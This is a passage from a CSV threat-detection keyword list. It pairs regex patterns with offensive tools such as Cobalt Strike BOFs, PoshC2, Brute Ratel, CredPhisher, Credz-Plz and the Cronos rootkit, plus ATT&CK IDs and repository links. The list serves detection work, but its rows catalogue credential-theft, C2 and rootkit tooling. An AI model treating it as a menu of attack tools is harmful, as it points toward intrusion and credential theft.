TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_SunLogin.py*",".{0,1000}CredentialAccess_CredentialDumping_SunLogin\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_WindowsHashDump.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsHashDump\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsWDigestEnable\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialInFiles_BrowserData.py*",".{0,1000}CredentialAccess_CredentialInFiles_BrowserData\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialInFiles_WindowsSoftware.py*",".{0,1000}CredentialAccess_CredentialInFiles_WindowsSoftware\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*",".{0,1000}CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Credentials Found in Configurations!*",".{0,1000}Credentials\sFound\sin\sConfigurations!.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Credentials*hekatomb_*.txt",".{0,1000}Credentials.{0,1000}hekatomb_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Credentials/CacheDump.*",".{0,1000}Credentials\/CacheDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Credentials/certsync_*",".{0,1000}Credentials\/certsync_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Credentials/LSASecrets.*",".{0,1000}Credentials\/LSASecrets\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Credentials/SAMDump*",".{0,1000}Credentials\/SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*credmaster.py *",".{0,1000}credmaster\.py\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*CredMaster\passwords.txt*",".{0,1000}CredMaster\\passwords\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*CredPhisher.csproj*",".{0,1000}CredPhisher\.csproj.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*CredPhisher.exe*",".{0,1000}CredPhisher\.exe.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*credphisher.py*",".{0,1000}credphisher\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*cred-popper *",".{0,1000}cred\-popper\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CredPrompt/CredPrompt.cna*",".{0,1000}CredPrompt\/CredPrompt\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*creds_hunt.exe*",".{0,1000}creds_hunt\.exe.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*CredsLeaker*",".{0,1000}CredsLeaker.{0,1000}","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","4","303","71","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z" "*CredsPhish.ps1*",".{0,1000}CredsPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Credz-Plz.ps1*",".{0,1000}Credz\-Plz\.ps1.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Credz-Plz-Execute.txt*",".{0,1000}Credz\-Plz\-Execute\.txt.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*cribdragg3r/Alaris*",".{0,1000}cribdragg3r\/Alaris.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*crimeware*/zeus.profile*",".{0,1000}crimeware.{0,1000}\/zeus\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*crisis_monitor start*",".{0,1000}crisis_monitor\sstart.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisis_monitor stop*",".{0,1000}crisis_monitor\sstop.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisprss/PrintSpoofer*",".{0,1000}crisprss\/PrintSpoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*crk_get_key1*",".{0,1000}crk_get_key1.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_get_key2*",".{0,1000}crk_get_key2.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_max_keys_per_crypt*",".{0,1000}crk_max_keys_per_crypt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_methods.*",".{0,1000}crk_methods\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_password_loop*",".{0,1000}crk_password_loop.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*cron_priv_esc(payload*",".{0,1000}cron_priv_esc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Cronos Rootkit.*",".{0,1000}Cronos\sRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CronosDebugger.*",".{0,1000}CronosDebugger\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CronosRootkit.*",".{0,1000}CronosRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CrontabPersistence.json*",".{0,1000}CrontabPersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*",".{0,1000}crop\.exe\s\\\\.{0,1000}\\.{0,1000}\.lnk\s\\\\.{0,1000}\\harvest\s\\\\.{0,1000}\\harvest.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*cross_s4u.c*",".{0,1000}cross_s4u\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*cross_s4u.x64.o*",".{0,1000}cross_s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*CrossC2 beacon*",".{0,1000}CrossC2\sbeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2 dyn load*",".{0,1000}crossc2\sdyn\sload.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2 framework*",".{0,1000}CrossC2\sframework.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - 